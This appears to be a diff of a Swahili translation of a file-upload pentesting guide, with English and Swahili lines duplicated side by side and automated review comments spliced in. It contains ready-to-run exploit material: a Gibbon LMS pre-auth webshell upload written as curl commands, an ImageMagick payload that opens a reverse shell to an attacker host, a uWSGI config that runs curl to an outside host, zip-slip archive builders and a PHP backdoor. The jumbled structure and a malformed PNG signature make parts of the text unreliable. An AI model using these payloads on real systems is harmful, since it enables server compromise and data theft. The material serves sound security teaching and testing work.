- Ukurasa wa wavuti pia unaweza kuwa unafanyia **resizing** image, kwa mfano kwa kutumia PHP-GD functions `imagecopyresized` au `imagecopyresampled`. Hata hivyo, unaweza kutumia **IDAT chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayestahimili compression.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_idat_png.php)
- Another technique to make a payload that **survives an image resizing**, using the PHP-GD function `thumbnailImage`. However, you could use the **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
- Mbinu nyingine ya kutengeneza payload inayestahimili image resizing, kwa kutumia PHP-GD function `thumbnailImage`. Hata hivyo, unaweza kutumia **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayestahimili compression.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_tEXt_png.php)
### Other Tricks to check
### Mbinu Nyingine za Kuangalia
- Pata udhaifu wa **rename** faili iliyopakiwa (kubadilisha extension).
- Pata udhaifu wa **Local File Inclusion** ili kutekeleza backdoor.
- Tafuta udhaifu wa kubadilisha jina la faili iliyopakuliwa tayari (ili kubadilisha extension).
- Tafuta Local File Inclusion vulnerability ili kutekeleza backdoor.
- **Possible Information disclosure**:
1. Pakia faili ile ile **mara nyingi** (na kwa **wakati mmoja**) zikiwa na **jina lile lile**.
2. Pakia faili yenye jina la faili au folda ambayo **tayari ipo**.
3. Kupakia faili yenye jina '.' , '..' , au '...' kama jina lake. Kwa mfano, katika Apache kwenye **Windows**, ikiwa application inahifadhi uploaded files katika "/www/uploads/" directory, faili yenye jina '.' itaunda faili inayoitwa "uploads" katika "/www/" directory.
4. Pakia faili ambayo huenda isifutike kwa urahisi kama **'...:.jpg'** katika **NTFS**. (Windows)
5. Pakia faili katika **Windows** yenye **invalid characters** kama `|<>*?”` katika jina lake. (Windows)
6. Pakia faili katika **Windows** ukitumia majina yaliyohifadhiwa (forbidden) kama CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, na LPT9.
- Jaribu pia kupakia **executable** (.exe) au **.html** (inayoshindikana kuwa hatari) ambayo ita- execute code wakati mwathiriwa atakapoifunua kwa bahati mbaya.
1. Pakia **mara kadhaa** (na kwa **wakati mmoja**) **faili ile ile** yenye **jina moja**
2. Pakia faili yenye **jina** la **file** au **folder** ambalo **tayari lipo**
3. Kupakia faili yenye majina ya `"." , "..", or "…"` kama jina lake. Kwa mfano, kwenye Apache kwenye **Windows**, ikiwa application inahifadhi uploaded files katika "/www/uploads/" directory, jina la faili "." litaunda faili liitwalo "uploads" katika directory "/www/".
4. Pakia faili ambayo inaweza isiwe rahisi kufutwa kama **"…:.jpg"** kwenye **NTFS**. (Windows)
5. Pakia faili kwenye **Windows** yenye **invalid characters** kama `|<>*?”` katika jina lake. (Windows)
6. Pakia faili kwenye **Windows** ukitumia **reserved** (**forbidden**) **names** kama CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, na LPT9.
- Jaribu pia kupakia an executable (.exe) au `.html` (inayoonekana isiyoshtua) ambayo itatekeleza code inapofunguliwa kwa bahati mbaya na mwanaathiriwa.
### Special extension tricks
If you are trying to upload files to a **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/php-tricks-esp/index.html#code-execution).\
If you are trying to upload files to an **ASP server**, [take a look at the **.config** trick to execute code](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).
Ikiwa unajaribu kupakia faili kwenye **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/php-tricks-esp/index.html#code-execution).\
Ikiwa unajaribu kupakia faili kwenye **ASP server**, [take a look at the **.config** trick to execute code](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).
The `.phar` files are like the `.jar` for java, but for php, and can be **used like a php file** (executing it with php, or including it inside a script...)
Faili za `.phar` ni kama `.jar` kwa java, lakini kwa php, na zinaweza **kutumika kama php file** (kuzitekeleza kwa php, au kuzijumlisha ndani ya script...)
The `.inc` extension is sometimes used for php files that are only used to **import files**, so, at some point, someone could have allow **this extension to be executed**.
Extension ya `.inc` mara nyingi hutumika kwa php files zinazotumika tu **kuimport files**, hivyo, wakati fulani, mtu anaweza kuruhusu **extension hii itekelezwe**.
## **Jetty RCE**
If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell!
Ikiwa unaweza kupakia faili ya XML kwenye Jetty server unaweza kupata [RCE because **new *.xml and *.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** Kwa hivyo, kama inavyoonyeshwa kwenye picha ifuatayo, pakia faili ya XML kwenye `$JETTY_BASE/webapps/` na tarajia shell!
![https://twitter.com/ptswarm/status/1555184661751648256/photo/1](<../../images/image (1047).png>)
## **uWSGI RCE**
For a detailed exploration of this vulnerability check the original research: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html).
Kwa uchambuzi wa kina wa udhaifu huyu angalia utafiti wa asili: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html).
Remote Command Execution (RCE) vulnerabilities can be exploited in uWSGI servers if one has the capability to modify the `.ini` configuration file. uWSGI configuration files leverage a specific syntax to incorporate "magic" variables, placeholders, and operators. Notably, the '@' operator, utilized as `@(filename)`, is designed to include the contents of a file. Among the various supported schemes in uWSGI, the "exec" scheme is particularly potent, allowing the reading of data from a process's standard output. This feature can be manipulated for nefarious purposes such as Remote Command Execution or Arbitrary File Write/Read when a `.ini` configuration file is processed.
Udhaifu za Remote Command Execution (RCE) zinaweza kutumika kwenye uWSGI servers ikiwa mtu ana uwezo wa kubadilisha `.ini` configuration file. uWSGI configuration files hutegemea syntax maalum kujumuisha "magic" variables, placeholders, na operators. Kwa mfano, operator '@', inayotumika kama `@(filename)`, imeundwa kujumuisha yaliyomo ya file. Miongoni mwa schemes mbalimbali zinazotambuliwa na uWSGI, scheme ya "exec" ni hasa yenye nguvu, ikiruhusu kusoma data kutoka standard output ya mchakato. Kipengele hiki kinaweza kutumiwa kwa madhumuni mabaya kama Remote Command Execution au Arbitrary File Write/Read wakati `.ini` configuration file inapototolewa.
Consider the following example of a harmful `uwsgi.ini` file, showcasing various schemes:
Tafakari mfano ufuatao wa hatari wa `uwsgi.ini` file, unaoonyesha schemes mbalimbali:
```ini
[uwsgi]
; read from a symbol
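Review bot: L936 and L937 replace the three-dot filenames with the Unicode ellipsis character: `"." , "..", or "…"` and `"…:.jpg"` instead of the `'...'` and `'...:.jpg'` in L929 and L930. That silently changes the payload the step describes (a name made of three ASCII dots), so restore the plain dots. Two smaller points in the same hunk: L940 leaves "an executable" untranslated, and "inapototolewa" in L958 should read "inapochakatwa" (when the `.ini` file is processed).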
@ -156,15 +156,54 @@ extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)
```
Utekelezaji wa payload hutokea wakati wa kuchanganua faili ya usanidi. Ili usanidi uanze na uchanganywe, mchakato wa uWSGI lazima uanzishwe upya (potentially after a crash or due to a Denial of Service attack) au faili lazima iwe imewekwa kwenye auto-reload. Kipengele cha auto-reload, ikiwa kimewezeshwa, hurudisha faili kwa vipindi vilivyowekwa baada ya kugundua mabadiliko.
Utekelezaji wa payload hufanyika wakati faili ya usanidi inachanganuliwa. Ili usanidi uanze kutumika na kuchanganuliwa, mchakato wa uWSGI lazima uanzishwe upya (kwa mfano baada ya crash au kutokana na Denial of Service attack) au faili lazima iwe imewekwa ku-auto-reload. Kipengele cha auto-reload, ikiwa kimewezeshwa, kinapakia tena faili kwa vipindi vilivyobainishwa linapogundua mabadiliko.
Ni muhimu kuelewa upole wa jinsi uWSGI inavyochanganua faili za usanidi. Hasa, payload iliyojadiliwa inaweza kuingizwa ndani ya faili ya binary (kama image au PDF), hivyo kupanua zaidi wigo la uwezekano wa matumizi mabaya.
Ni muhimu kuelewa jinsi uchanganaji wa faili za usanidi za uWSGI unavyokuwa mwepesi. Hasa, payload iliyojadiliwa inaweza kuingizwa ndani ya faili ya binary (kama picha au PDF), jambo linalopanua zaidi wigo wa potential exploitation.
## **wget Kupakia Faili/SSRF Triki**
### Gibbon LMS arbitrary file write to pre-auth RCE (CVE-2023-45878)
Katika baadhi ya matukio unaweza kugundua kwamba server inatumia **`wget`** kupakua **mafayili** na unaweza **kutaja** **URL**. Katika kesi hizi, code inaweza kukagua kwamba extension ya mafaili yaliyopakuliwa iko kwenye whitelist ili kuhakikisha kwamba mafaili yanayoruhusiwa pekee ndio yatakapopakuliwa. Hata hivyo, **ukaguzi huu unaweza kupitishwa.**\
Endpoint isiyothibitishwa katika Gibbon LMS inaruhusu uandishi wa faili kwa makusudi ndani ya web root, ikisababisha pre-auth RCE kwa kuacha faili ya PHP. Toleo zilizoathirika: hadi na pamoja na 25.0.01.
Urefu wa **jina la faili** katika **linux** ni **255**, hata hivyo, **wget** inakata majina ya faili hadi **236** herufi. Unaweza **kupakua faili inayoitwa "A"\*232+".php"+".gif"**, jina hili la faili litatoka kwenye **ukaguzi** (kwa mfano hapa **".gif"** ni extension halali) lakini `wget` itabadilisha jina la faili kuwa **"A"\*232+".php"**.
- Endpoint: `/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php`
- Njia: POST
- Vigezo vinavyohitajika:
- `img`: data-URI-like string: `[mime];[name],[base64]` (server inapuuza type/name, inafanya base64-decode sehemu ya mwisho)
- `path`: jina la faili linalolengwa kulingana na Gibbon install dir (e.g., `poc.php` or `0xdf.php`)
- `gibbonPersonID`: thamani yoyote isiyo tupu inakubaliwa (e.g., `0000000001`)
Minimal PoC ya kuandika na kusoma tena faili:
```bash
# Prepare test payload
printf '0xdf was here!' | base64
# => MHhkZiB3YXMgaGVyZSEK
# Write poc.php via unauth POST
curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
-d 'img=image/png;test,MHhkZiB3YXMgaGVyZSEK&path=poc.php&gibbonPersonID=0000000001'
# Verify write
curl http://target/Gibbon-LMS/poc.php
```
Pakia webshell mdogo na endesha amri:
```bash
# '<?php system($_GET["cmd"]); ?>' base64
# PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg==
curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
-d 'img=image/png;foo,PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg==&path=shell.php&gibbonPersonID=0000000001'
curl 'http://target/Gibbon-LMS/shell.php?cmd=whoami'
```
Vidokezo:
- Mshughuliki hufanya `base64_decode($_POST["img"])` baada ya kugawanya kwa `;` na `,`, kisha inaandika bytes kwa `$absolutePath . '/' . $_POST['path']` bila kuthibitisha extension/type.
- Msimbo utakaotokana unaendesha kama mtumiaji wa web service (kwa mfano, XAMPP Apache on Windows).
References for this bug include the usd HeroLab advisory and the NVD entry. See the References section below.
## **wget File Upload/SSRF Trick**
Katika baadhi ya matukio unaweza kugundua kuwa seva inatumia **`wget`** kupakua **faili** na unaweza **kuonyesha** **URL**. Katika hali hizi, msimbo unaweza kuwa unakagua kwamba extension ya faili zilizopakuliwa iko kwenye whitelist ili kuhakikisha kwamba ni faili zilizoruhusiwa tu zitakazopakuliwa. Hata hivyo, **ukaguzi huu unaweza kuvukiwa.**\
Urefu wa **maximum** wa **filename** katika **linux** ni **255**, hata hivyo, **wget** hupunguza majina ya faili hadi **236** characters. Unaweza **download a file called "A"*232+".php"+".gif"**, jina hili la faili lita**bypass** **check** (kama katika mfano huu **".gif"** ni **valid** extension) lakini `wget` itanipa jina jipya la faili kuwa **"A"*232+".php"**.
```bash
#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
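Review bot: L1005 ("References for this bug include the usd HeroLab advisory and the NVD entry. See the References section below.") is left in English in a translation commit and should be translated like the surrounding lines. In L1008, "`wget` itanipa jina jipya la faili kuwa" ("will give me a new filename") should follow L976: "`wget` itabadilisha jina la faili kuwa **"A"\*232+".php"**". Also "uchanganaji" in L971 is a typo for "uchanganuzi".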
@ -187,35 +226,35 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[=============================================
2020-06-13 03:14:06 (1.96 MB/s) - AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php saved [10/10]
```
Kumbuka kwamba **chaguo jingine** unaloweza kufikiriwa nalo kuzunguka ukaguzi huu ni kufanya **HTTP server i-redirect kwa faili tofauti**, hivyo URL ya awali itaingia bila kukaguliwa kisha wget itapakua faili iliyorejeshwa kwa jina jipya. Hii **haitafanya kazi** **isipokuwa** wget inatumiwa na **parameter** `--trust-server-names` kwa sababu **wget itapakua ukurasa uliorejeshwa kwa jina la faili lililoonyeshwa kwenye URL ya asili**.
Note that **another option** you may be thinking of to bypass this check is to make the **HTTP server redirect to a different file**, so the initial URL will bypass the check by then wget will download the redirected file with the new name. This **won't work** **unless** wget is being used with the **parameter** `--trust-server-names` because **wget will download the redirected page with the name of the file indicated in the original URL**.
## Zana
- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) ni zana yenye nguvu iliyoundwa kusaidia Pentesters na Bug Hunters katika kujaribu file upload mechanisms. Inatumia mbinu mbalimbali za bug bounty ili kurahisisha mchakato wa kubaini na kutumia vulnerabilities, kuhakikisha tathmini ya kina ya web applications.
- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) ni zana yenye nguvu iliyoundwa kusaidia Pentesters na Bug Hunters katika kujaribu mifumo ya kupakia faili. Inatumia mbinu mbalimbali za bug bounty ili kurahisisha mchakato wa kutambua na kutumia udhaifu, ikihakikisha tathmini kamili za web applications.
### Corrupting upload indices with snprintf quirks (historical)
Baadhi ya legacy upload handlers zinazotumia `snprintf()` au njia kama hiyo kujenga multi-file arrays kutoka kwa single-file upload zinaweza kudanganywa kuunda muundo wa `_FILES`. Kutokana na kutokamilika na kukatwa kwa tabia ya `snprintf()`, upload moja iliyoundwa kwa uangalifu inaweza kuonekana kama faili nyingi zilizo na index upande wa server, ikachanganya mantiki inayodhani muundo thabiti (kwa mfano, kuitenda kama multi-file upload na kuchukua matawi hatarishi). Ingawa ni niche leo, muundo huu wa “index corruption” mara kwa mara hujitokeza tena katika CTFs na codebases za zamani.
Baadhi ya upload handlers za zamani ambazo zinatumia `snprintf()` au sawa ili kujenga arrays za faili nyingi kutoka kwa upload ya faili moja zinaweza kudanganywa kujifanya zinafanya forge ya muundo wa `_FILES`. Kutokana na kutokukamilika na kukatwa kwa tabia ya `snprintf()`, upload iliyoundwa kwa uangalifu inaweza kuonekana kama faili nyingi zilizo na index kwenye upande wa server, ikachanganya mantiki inayodhani muundo thabiti (mfano, kuitaza kama upload ya faili nyingi na kuchukua matawi hatarishi). Ingawa ni nadra leo, muundo huu wa “index corruption” mara kwa mara huibuka tena katika CTFs na codebases za zamani.
## Kutoka File upload hadi vulnerabilities nyingine
## From File upload to other vulnerabilities
- Set **filename** to `../../../tmp/lol.png` and try to achieve a **path traversal**
- Set **filename** to `sleep(10)-- -.jpg` and you may be able to achieve a **SQL injection**
- Set **filename** to `<svg onload=alert(document.domain)>` to achieve a XSS
- Set **filename** to `; sleep 10;` to test some command injection (more [command injections tricks here](../command-injection.md))
- Weka **filename** kuwa `../../../tmp/lol.png` na jaribu kupata **path traversal**
- Weka **filename** kuwa `sleep(10)-- -.jpg` na huenda ukaweza kupata **SQL injection**
- Weka **filename** kuwa `<svg onload=alert(document.domain)>` ili kupata XSS
- Weka **filename** kuwa `; sleep 10;` ili kujaribu command injection (more [command injections tricks here](../command-injection.md))
- [**XSS** in image (svg) file upload](../xss-cross-site-scripting/index.html#xss-uploading-files-svg)
- **JS** file **upload** + **XSS** = [**Service Workers** exploitation](../xss-cross-site-scripting/index.html#xss-abusing-service-workers)
- [**XXE in svg upload**](../xxe-xee-xml-external-entity.md#svg-file-upload)
- [**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files)
- Try **different svg payloads** from [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
- Jaribu **different svg payloads** kutoka [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
- [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
- If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery/index.html). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**.
- Ikiwa unaweza **kuonyesha web server ichukue picha kutoka kwa URL** unaweza kujaribu kubadilisha kwa kutumia [SSRF](../ssrf-server-side-request-forgery/index.html). Ikiwa picha hii itahifadhiwa kwenye tovuti **public**, unaweza pia kuonyesha URL kutoka [https://iplogger.org/invisible/](https://iplogger.org/invisible/) na **kuiba taarifa za kila mgeni**.
- [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md)
- Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications.
- Upload the \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) content to check if the server has any **antivirus**
- Check if there is any **size limit** uploading files
- PDF zilizotengenezwa kwa njia maalumu kwa XSS: Ukurasa wa [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). Ikiwa unaweza kupakia PDFs unaweza kuandaa PDF itakayotekeleza JS kwa mujibu wa maelekezo yaliyotolewa.
- Pakia yaliyomo ya \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) ili kuangalia kama server ina **antivirus**
- Angalia kama kuna **kizuizi cha ukubwa** wakati wa kupakia faili
Heres a top 10 list of things that you can achieve by uploading (from [here](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
Hapa kuna orodha ya top 10 ya mambo unayoweza kufanya kwa kupakia (kutoka [here](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
1. **ASP / ASPX / PHP5 / PHP / PHP3**: Webshell / RCE
2. **SVG**: Stored XSS / SSRF / XXE
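Review bot: the eicar item in this hunk (`Pakia yaliyomo ya \[eicar]\(...`) keeps the backslash-escaped brackets from the English line above it, so it renders as literal `[eicar](...)` text instead of a link; drop the escapes so it reads `[eicar](https://secure.eicar.org/eicar.com.txt)`. Two translated lines also leave English fragments inside Swahili sentences: `Jaribu **different svg payloads** kutoka` and `Ukurasa wa [following page present how to **inject PDF data to obtain JS execution**]`, where the bold/link text should be translated like the rest of the item. Finally, the SSRF item renders "abuse a SSRF" as `kubadilisha kwa kutumia [SSRF]` ("change by using"), which loses the meaning; the commit itself uses `Kutumia vibaya` for "abusing" further down, so the same term fits here.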
@ -240,39 +279,40 @@ https://github.com/portswigger/upload-scanner
- **PNG**: `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\x s0\x03["`
- **JPG**: `"\xff\xd8\xff"`
Rejea kwa [https://en.wikipedia.org/wiki/List_of_file_signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) kwa filetypes nyingine.
Rejea [https://en.wikipedia.org/wiki/List_of_file_signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) kwa aina nyingine za faili.
## Zip/Tar File Automatically decompressed Upload
Ikiwa unaweza kupakia ZIP itakayofinyangwa ndani ya server, unaweza kufanya mambo 2:
Ikiwa unaweza kupakia ZIP ambayo itafunguliwa ndani ya server, unaweza kufanya vitu 2:
### Symlink
Upload a link containing soft links to other files, then, accessing the decompressed files you will access the linked files:
Pakia archive lenye soft links kuelekea kwa faili nyingine, kisha kwa kufikia faili zilizofunguliwa utaweza kufikia faili zilizohusishwa:
```
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt
```
### Decompress katika folda tofauti
### Kufungua (decompress) katika folda tofauti
Uundaji usiotarajiwa wa faili kwenye saraka wakati wa decompress ni tatizo kubwa. Licha ya dhana za awali kwamba mpangilio huu unaweza kulinda dhidi ya utekelezaji wa amri za OS-level kupitia upakiaji wa faili zenye madhara, msaada wa compression wa kihierarkia na uwezo wa directory traversal wa muundo wa archive wa ZIP unaweza kutumika vibaya. Hii inawawezesha wadukuzi kupita vikwazo na kutoka katika saraka za upakiaji salama kwa kudhibiti utendaji wa decompression wa programu inayolengwa.
Uundaji wa mafaili yasiyotarajiwa ndani ya directories wakati wa decompression ni tatizo kubwa. Ingawa awali mtu angefikiri kwamba mpangilio huu unaweza kuzuia OS-level command execution kupitia malicious file uploads, msaada wa hierarchical compression na uwezo wa directory traversal wa fomati ya ZIP unaweza kutumika vibaya. Hii inawawezesha attackers kupita vikwazo na kutoroka kutoka kwa secure upload directories kwa kudanganya decompression functionality ya application iliyolengwa.
Exploit iliyotautomatiiza ya kutengeneza faili kama hizi inapatikana kwenye [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc). Zana inaweza kutumika kama inavyoonyeshwa:
Automated exploit ya kutengeneza mafaili kama hayo inapatikana kwenye [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc). Zana inaweza kutumika kama ifuatavyo:
```python
# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
```
Zaidi ya hayo, **symlink trick with evilarc** ni chaguo. Ikiwa lengo ni kulenga faili kama `/flag.txt`, symlink kwa faili hiyo inapaswa kuundwa kwenye mfumo wako. Hii inahakikisha kwamba evilarc haitapata makosa wakati wa utekelezaji wake.
Zaidi ya hayo, **symlink trick with evilarc** ni chaguo. Ikiwa lengo ni kulenga faili kama `/flag.txt`, symlink kwa faili hiyo inapaswa kuundwa kwenye mfumo wako. Hii inahakikisha kwamba evilarc haitapata makosa wakati wa kuendesha.
Chini kuna mfano wa Python code unaotumika kuunda zip file ya hatari:
Hapo chini kuna mfano wa Python code unaotumika kuunda faili ya zip yenye madhara:
```python
#!/usr/bin/python
import zipfile
from io import BytesIO
def create_zip():
f = BytesIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
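Review bot: the fence around `python2 evilarc.py -h` / `python2 evilarc.py -o unix -d 5 ...` is tagged ```python although the contents are shell commands, not Python source; tag it ```bash like the other command blocks in this file, and the untagged fence around `ln -s ... / zip --symlinks ... / tar -cvf ...` should get the same tag. Two points on the unchanged context this hunk carries: the PNG signature string on the `- **PNG**:` line contains `\x s0`, which is not a valid hex escape (a stray space inside `\x..`), so the sample is not byte-accurate as written and the reliable part is only the 8-byte signature `\x89PNG\r\n\x1a\n`; and the body of `create_zip()` (`f = BytesIO()`, `z = zipfile.ZipFile(...)`) appears at column 0 directly under `def create_zip():`, so confirm the indentation survives in the file rather than only being flattened by the diff view, since without it the block is a SyntaxError.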
@ -285,11 +325,11 @@ zip.close()
create_zip()
```
**Kunyanyasa compression kwa file spraying**
**Kutumia vibaya compression kwa file spraying**
Kwa maelezo zaidi **angalia chapisho la awali katika**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
Kwa maelezo zaidi **angalia chapisho la asili katika**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
1. **Kuunda PHP Shell**: Msimbo wa PHP umeandikwa kutekeleza amri zinazopitishwa kupitia variable `$_REQUEST`.
1. **Creating a PHP Shell**: Msimbo wa PHP umeandikwa kutekeleza amri zinazopitishwa kupitia variable `$_REQUEST`.
```php
<?php
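Review bot: the step title on the changed line goes the wrong way for a translation commit: `1. **Kuunda PHP Shell**` (Swahili) is replaced by `1. **Creating a PHP Shell**` (English), while the heading two lines above it is translated in the same commit (`**Kutumia vibaya compression kwa file spraying**`). Keep the Swahili title so the numbered steps match the surrounding prose; the same applies to the other step titles in this list if they are treated the same way.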
@ -299,65 +339,68 @@ system($cmd);
}?>
```
2. **File Spraying and Compressed File Creation**: Faili nyingi zinaundwa na archive ya zip inatengenezwa ikiwa na faili hizi.
2. **File Spraying and Compressed File Creation**: Faili nyingi zinaumbwa na archive ya zip inajengwa ikijumuisha faili hizi.
```bash
root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php
```
3. **Modification with a Hex Editor or vi**: Majina ya faili ndani ya zip yamebadilishwa kwa kutumia vi au hex editor, kubadilisha "xxA" kuwa "../" ili kupita kwenye saraka.
3. **Modification with a Hex Editor or vi**: Majina ya faili ndani ya zip yanabadilishwa kwa kutumia vi au hex editor, kubadilisha "xxA" kuwa "../" ili kupita kwenye directories.
```bash
:set modifiable
:%s/xxA/..\//g
:%s/xxA/../g
:x!
```
## ImageTragic
Pakia yaliyomo haya kwa extension ya image ili ku-exploit udhaifu **(ImageMagick , 7.0.1-1)** (form the [exploit](https://www.exploit-db.com/exploits/39767))
Pakia yaliyomo haya kwa extension ya picha ili kutumia udhaifu **(ImageMagick , 7.0.1-1)** (tazama [exploit](https://www.exploit-db.com/exploits/39767))
```
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context
```
## Kuingiza PHP Shell kwenye PNG
## Embedding PHP Shell on PNG
Kuingiza PHP shell katika chunk ya IDAT ya faili ya PNG kunaweza kuepuka kwa ufanisi baadhi ya operesheni za usindikaji wa picha. Funguo za `imagecopyresized` na `imagecopyresampled` kutoka PHP-GD zina umuhimu maalum katika muktadha huu, kwani hutumika mara kwa mara kwa kupima upya na resampling picha, kwa mtiririko huo. Uwezo wa PHP shell iliyowekwa ndani ya kukaa bila kuathiriwa na operesheni hizi ni faida muhimu kwa matumizi fulani.
Kuingiza PHP shell ndani ya chunk ya IDAT ya faili ya PNG kunaweza kuzuia kwa ufanisi baadhi ya operesheni za usindikaji wa picha. Funsioni `imagecopyresized` na `imagecopyresampled` kutoka PHP-GD zina umuhimu maalum katika muktadha huu, kwani kwa kawaida zinatumiwa kwa resizing na resampling ya picha, mtawalia. Uwezo wa PHP shell iliyojazwa kubaki isiyoathiriwa na operesheni hizi ni faida muhimu kwa matumizi fulani.
Uchunguzi wa kina wa mbinu hii, ikijumuisha metodologia na matumizi yake yanayowezekana, umepangwa katika makala ifuatayo: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/). Rasilimali hii inatoa uelewa mpana wa mchakato na athari zake.
Uchambuzi wa kina wa mbinu hii, ikiwa ni pamoja na metodolojia na matumizi yake yanayowezekana, unapatikana katika makala ifuatayo: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/). Rasilimali hii inatoa uelewa mpana wa mchakato na athari zake.
Taarifa zaidi: [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
More information in: [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
## Polyglot Files
Polyglot files hutumika kama chombo cha kipekee katika cybersecurity, zikifanya kazi kama chameleon ambazo zinaweza kuwepo kwa uhalali katika miundo mbalimbali ya faili kwa wakati mmoja. Mfano wa kuvutia ni [GIFAR](https://en.wikipedia.org/wiki/Gifar), muunganiko ambao hufanya kazi kama GIF na pia kama archive ya RAR. Faili kama hizi hazikikwi kwa muunganisho huo pekee; mchanganyiko kama GIF na JS au PPT na JS pia yanawezekana.
Polyglot files zinatumika kama zana ya kipekee katika usalama wa mtandao, zikifanya kazi kama chameleon ambazo zinaweza kuwepo kwa uhalali katika miundo mbalimbali ya faili kwa wakati mmoja. Mfano wa kuvutia ni [GIFAR](https://en.wikipedia.org/wiki/Gifar), nyongeza inayofanya kazi wakati huo huo kama GIF na archive ya RAR. Faili hizi hazizuiliki kwa jozi hii tu; mchanganyiko kama GIF na JS au PPT na JS pia inawezekana.
